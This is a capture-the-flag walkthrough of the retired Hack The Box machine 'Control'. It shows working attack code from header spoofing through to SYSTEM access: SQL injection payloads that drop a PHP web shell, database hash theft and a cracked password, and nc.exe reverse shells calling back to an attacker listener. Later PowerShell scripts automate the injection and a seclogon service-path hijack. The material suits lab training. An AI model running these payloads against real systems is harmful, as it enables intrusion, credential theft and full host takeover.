Control: Hack The Box Walkthrough
source link: https://hackso.me/control-htb-walkthrough/
This post documents the complete walkthrough of Control, a retired vulnerable VM created by TRX , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
On this post
- Background
- Information Gathering
- Admin Interface Bypass
- Taking baby steps to discover SQL Injection
- Low-Privilege Shell
- Hector is in the Remote Management Users group
- Get that hash
- John the Ripper
- PowerShell Remoting / WinRM
- Getting user.txt
- Privilege Escalation
- Stopped state
- Run as LocalSystem with no dependencies
- Hector is able to start the service
- Getting root.txt
Background
Control is a retired vulnerable VM from Hack The Box.
Information Gathering
Let's start with a masscan probe to establish the open ports on the host.
```
# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.167 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-11-25 07:40:50 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 135/tcp on 10.10.10.167
Discovered open port 49667/tcp on 10.10.10.167
Discovered open port 49666/tcp on 10.10.10.167
Discovered open port 3306/tcp on 10.10.10.167
Discovered open port 80/tcp on 10.10.10.167
```
Nothing unusual. Let's do one better with nmap, scanning the discovered ports to establish their services.
```
# nmap -n -v -Pn -p80,135,3306 -A --reason -oN nmap.txt 10.10.10.167
...
PORT     STATE SERVICE REASON          VERSION
80/tcp   open  http    syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
3306/tcp open  mysql?  syn-ack ttl 127
| fingerprint-strings:
|   FourOhFourRequest, GetRequest, LDAPSearchReq, LPDString, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie, WMSRequest, afp, giop, ms-sql-s:
|_    Host '10.10.15.82' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=11/25%Time=5DDB86B6%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPR
SF:equest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionReq,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerC
SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessio
SF:nReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFour
SF:Request,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LPDStri
SF:ng,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchRe
SF:q,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(ms-sql-s,4A,"F\0\0\x01\xffj
SF:\x04Host\x20'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(afp,4A,"F\0\0\x01\xffj\x04Host\x2
SF:0'10\.10\.15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20thi
SF:s\x20MariaDB\x20server")%r(giop,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.
SF:15\.82'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Maria
SF:DB\x20server");
```
There is a MariaDB (MySQL-compatible) service behind 3306/tcp, but it refuses connections from our address outright, so any database access will have to go through the web application.
That leaves us with the http service. This is what the site looks like.
Oh, before I forget, the IIS is running PHP as well.
Admin Interface Bypass
There's something interesting in the HTML source of index.php.
I've checked: /myfiles doesn't exist. There's also an interesting message when I try to access admin.php.
I put two and two together and made an educated guess: the message names the client IP address that's allowed to access admin.php, and such a check is usually made on an X-Forwarded-For type of header. To spoof it on every request, we can make use of Burp's Bypass WAF extension, which adds that header and its cousins (X-Originating-IP, X-Remote-IP, X-Remote-Addr) with the IP of our choosing.
Set the scope to the remote machine and we are good to go.
Presto!
Taking baby steps to discover SQL Injection
It's not long before I discovered a classic vulnerability: a single quote (') entered into the search field breaks the query, i.e. SQL injection within the search_products.php page.
Usually, we have to determine the number of columns in the injected query, but looking at the product listing above, the number of columns should be five or six. Let's enter the following into the search field.
```sql
' ORDER BY 7 -- -
```
That errors out, so the number of columns is six. Let's enter the following into the search field.
```sql
' UNION SELECT 1,2,3,4,5,@@VERSION -- -
```
So, the search_products.php page is susceptible to a UNION-based SQL injection. Time to drop a simple PHP backdoor like so.
```php
<?php echo shell_exec($_GET[0]); ?>
```
Enter the following into the search field. This version wraps the command output in htmlentities() inside a <pre> tag so it renders cleanly in the browser. Writing the file this way only works because the application's database account holds the FILE privilege, secure_file_priv does not restrict the destination, and the MariaDB service account can write to the web root.
```sql
' UNION SELECT 1,2,3,4,5,"<br><pre><?php echo htmlentities(shell_exec($_GET[0])); ?></pre>" INTO OUTFILE '\\inetpub\\wwwroot\\cmd.php' -- -
```
Let's see if we can execute remote commands through PHP.
Awesome!
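The column-count dance above is worth automating, since the same probes get typed on every injectable search box. The PowerShell script below is an added example, not code from the original post: it sends the ORDER BY probes the walkthrough types by hand, treating a reflected database error as the stopping signal, then confirms the count with a UNION row that puts @@version in the last column. The form field name (productName), the POST method and the error strings matched are assumptions, because the page does not show the raw request; the X-Forwarded-For value is the IP that admin.php revealed, which is why it is sent on every request.

```powershell
# Added example, not from the original post. Assumed: the search form POSTs to
# search_products.php with a field named productName, and the admin pages need
# the same X-Forwarded-For value that unlocked admin.php.
param(
    [Parameter(Mandatory)] [string] $ProxyIp,     # the IP admin.php says is allowed
    [string] $Target     = 'http://10.10.10.167',
    [int]    $MaxColumns = 20
)

function Send-Search {
    param([string] $Payload)
    $headers = @{ 'X-Forwarded-For' = $ProxyIp }
    $body    = @{ productName = $Payload }          # assumed field name
    try {
        $r = Invoke-WebRequest -Uri "$Target/search_products.php" -Method Post `
                -Headers $headers -Body $body -UseBasicParsing -ErrorAction Stop
        return $r.Content
    } catch {
        # A broken query may come back as an HTTP 500; keep whatever body text
        # PowerShell captured so the error message can still be matched.
        return "$($_.ErrorDetails.Message) $($_.Exception.Message)"
    }
}

function Test-SqlError([string] $Html) {
    # Assumed: MariaDB's error text is reflected, as it was for the lone quote
    return [bool]($Html -match 'Unknown column|You have an error in your SQL syntax')
}

function Find-ColumnCount {
    # ORDER BY n succeeds for every n up to the column count and fails at n+1
    for ($n = 1; $n -le $MaxColumns; $n++) {
        if (Test-SqlError (Send-Search "' ORDER BY $n -- -")) {
            if ($n -eq 1) { throw 'ORDER BY 1 already fails; the injection point needs another look' }
            return $n - 1
        }
    }
    throw "ORDER BY never failed up to $MaxColumns; re-check the injection point"
}

function Get-DbVersion([int] $Columns) {
    # Numeric markers in every column but the last, which carries @@version;
    # whichever markers show up in the page are the columns that get rendered.
    $cols = if ($Columns -gt 1) { @(1..($Columns - 1) | ForEach-Object { "$_" }) } else { @() }
    $cols += '@@version'
    $html = Send-Search "' UNION SELECT $($cols -join ',') -- -"
    if ($html -match '(\d+\.\d+\.\d+[\w.-]*MariaDB[\w.-]*)') { return $Matches[1] }
    return $null
}

$count = Find-ColumnCount
"Columns: $count"
"Version: $(Get-DbVersion $count)"
```

Run it as `.\probe.ps1 -ProxyIp <ip from admin.php>` from the attacking machine. If the version comes back empty while the count is right, the last column is simply not one the page renders; move `@@version` to one of the marker positions that did appear.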
Low-Privilege Shell
Time to get that shell. First, let's transfer nc.exe (from /usr/share/windows-resources/binaries/nc.exe on Kali) to a world-writable folder like \Windows\System32\spool\drivers\color.
Then launch the reverse shell through the PHP backdoor while nc listens for the incoming connection on our side.
And we have the initial foothold.
Hector is in the Remote Management Users group
During enumeration of iusr's account, I noticed that Hector is in the Remote Management Users group, which is what permits WinRM logons. That means his credentials must be lying somewhere…
Get that hash
To be honest, I was pleasantly surprised that I could even run the following SQLi and get something back; it means the application's database account can read the mysql.user table.
```sql
' UNION SELECT 1,2,3,4,user, password from mysql.user -- -
```
What do we have here? Hector's password hash!
John the Ripper
Armed with Hector's password hash, let's hand it to John the Ripper. A hash in the usual *-prefixed, 41-character mysql_native_password form is John's mysql-sha1 format.
Hector's password is l33th4x0rhector.
PowerShell Remoting / WinRM
Now that we have Hector's password, we can proceed to log in to Hector's account via PowerShell Remoting. But first, we need a PowerShell prompt: use nc.exe to spawn another reverse shell and enter PowerShell from there.
The hostname is Fidelity by the way. That's the only plot twist.
With that, we can use Start-Process to call upon our nc.exe (staged as cute.exe) to run the third reverse shell, this time as Hector.
```powershell
> Start-Process -FilePath \windows\system32\spool\drivers\color\cute.exe -ArgumentList "10.10.15.82 4444 -e cmd" -NoNewWindow
```
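The remoting call that wraps that Start-Process is not shown in full above, so here is an added example of the loopback WinRM step, not the author's exact command. It assumes the hostname Fidelity, the password cracked earlier, nc.exe staged as cute.exe in spool\drivers\color, and a listener on 10.10.15.82:4444, the values the post uses.

```powershell
# Added example, not the post's exact command. Run from the PowerShell prompt
# obtained as iusr. Assumed: hostname Fidelity, hector's cracked password,
# nc.exe staged as cute.exe, listener at 10.10.15.82:4444.
$user = 'Fidelity\hector'
$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)

# Membership in Remote Management Users is what allows this loopback WinRM logon;
# whoami confirms the session really runs as hector before anything else is done.
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock { whoami; hostname }

# Launch the reverse shell inside hector's session
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {
    Start-Process -FilePath C:\Windows\System32\spool\drivers\color\cute.exe `
        -ArgumentList '10.10.15.82 4444 -e cmd' -NoNewWindow
}
```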
Getting user.txt
The file user.txt is on Hector's Desktop. No surprise there.
Privilege Escalation
During enumeration of Hector's account, I noticed that Hector is able to do something special with one of the Registry keys: he can write to the service keys under HKLM\SYSTEM\CurrentControlSet\Services.
I generated the above with AccessChk from Microsoft Sysinternals like so.
```
> accesschk.exe -klr hklm\system\currentcontrolset
```
That means that Hector is able to change the ImagePath of any service under that key, but which one? The service must be in a stopped state, run as LocalSystem with no dependencies, and more importantly, Hector must have the permission to start the service.
Long story short, I chose the Secondary Logon service, or seclogon. Here's why.
Stopped state
Run as LocalSystem with no dependencies
Hector is able to start the service
Basically, the security descriptor string says that Authenticated Users (AU), which includes Hector, hold the RP right on the service object. On a service object that bit is SERVICE_START, i.e. Hector can start the Secondary Logon service.
Getting root.txt
To change the ImagePath of the seclogon service, we can use the very versatile REG.EXE command. These are typed into the cmd.exe shell that nc gave us, so %WINDIR% is expanded by the shell before REG stores the value (a REG_SZ would not be expanded by the Service Control Manager otherwise). REG DELETE throws the original ImagePath away, so record it with REG QUERY first if you intend to put the service back.
```
> REG DELETE HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /f
> REG ADD HKLM\SYSTEM\CURRENTCONTROLSET\Services\seclogon /v ImagePath /t REG_SZ /d "%WINDIR%\System32\cmd.exe /c start %WINDIR%\system32\spool\drivers\color\cute.exe 10.10.15.82 5555 -e cmd.exe" /f
> sc start seclogon
```
Time to claim the prize…
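Checking the four conditions (stopped, LocalSystem, no dependencies, startable by us) by hand across dozens of services is error-prone, and the REG DELETE above loses the original ImagePath. The PowerShell below is an added example, not code from the original post: it enumerates the services that satisfy all four conditions from Hector's shell, using the same SDDL reading as above (RP on the service object is SERVICE_START), then repoints the chosen service while keeping its unexpanded ImagePath so it can be restored. It assumes nc.exe was staged as cute.exe in spool\drivers\color and a listener on 10.10.15.82:5555, the values the post uses; the helper names and the sddlAlias table are mine.

```powershell
# Added example, not from the original post. Run as the low-privileged user.
# Assumed: nc.exe staged as cute.exe in spool\drivers\color, listener 10.10.15.82:5555.
$base   = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
# SDDL shorthand for the principals that matter here, mapped to SIDs
$sddlAlias = @{ AU = 'S-1-5-11'; WD = 'S-1-1-0'; IU = 'S-1-5-4'; BU = 'S-1-5-32-545' }

function Test-KeyWritable([string] $KeyPath) {
    # Can we set values on the service key? That is what rewriting ImagePath needs.
    try { $acl = Get-Acl -Path $KeyPath -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($mySids -contains $sid) -and
            ($ace.RegistryRights -band [System.Security.AccessControl.RegistryRights]::SetValue)) {
            return $true
        }
    }
    return $false
}

function Test-CanStart([string] $Name) {
    # sc sdshow prints the service security descriptor. RP in an Allow ACE for one
    # of our SIDs is SERVICE_START (0x10), the right the post reads as "Read Property".
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    foreach ($m in [regex]::Matches($sddl, '\(A;;([A-Z]+);;;([A-Z]{2}|S-[\d-]+)\)')) {
        $rights = $m.Groups[1].Value
        $who    = $m.Groups[2].Value
        if ($sddlAlias.ContainsKey($who)) { $who = $sddlAlias[$who] }
        if ($rights -match 'RP' -and $mySids -contains $who) { return $true }
    }
    return $false
}

# Enumerate services meeting all four conditions from the post
$candidates = foreach ($svc in Get-Service) {
    if ($svc.Status -ne 'Stopped') { continue }
    $key   = Join-Path $base $svc.Name
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props -or $props.ObjectName -ne 'LocalSystem') { continue }
    if ($props.DependOnService) { continue }            # must have no dependencies
    if (-not (Test-KeyWritable $key)) { continue }      # we must be able to change ImagePath
    if (-not (Test-CanStart $svc.Name)) { continue }    # and be allowed to start it
    [pscustomobject]@{ Name = $svc.Name; ImagePath = $props.ImagePath }
}
$candidates | Format-Table -AutoSize

# Hijack one of them (seclogon, as in the post), keeping the original ImagePath
# unexpanded so the service can be restored afterwards.
$name = 'seclogon'
$key  = Join-Path $base $name
$orig = (Get-Item $key).GetValue('ImagePath', $null, 'DoNotExpandEnvironmentNames')
$payload = '%WINDIR%\System32\cmd.exe /c start %WINDIR%\System32\spool\drivers\color\cute.exe 10.10.15.82 5555 -e cmd.exe'
# ExpandString so the SCM expands %WINDIR%; unlike cmd.exe, PowerShell will not expand it for us
Set-ItemProperty -Path $key -Name ImagePath -Value $payload -Type ExpandString
sc.exe start $name | Out-Null
Read-Host 'Catch the SYSTEM shell on the listener, then press Enter to restore the service'
Set-ItemProperty -Path $key -Name ImagePath -Value $orig -Type ExpandString
```

The enumeration deliberately checks key write access and start permission separately: many stopped LocalSystem services fail one but not the other, and only the intersection is usable. `sc start` reports a failure once cmd.exe exits without speaking the service protocol, which is expected; the reverse shell has already been spawned by then.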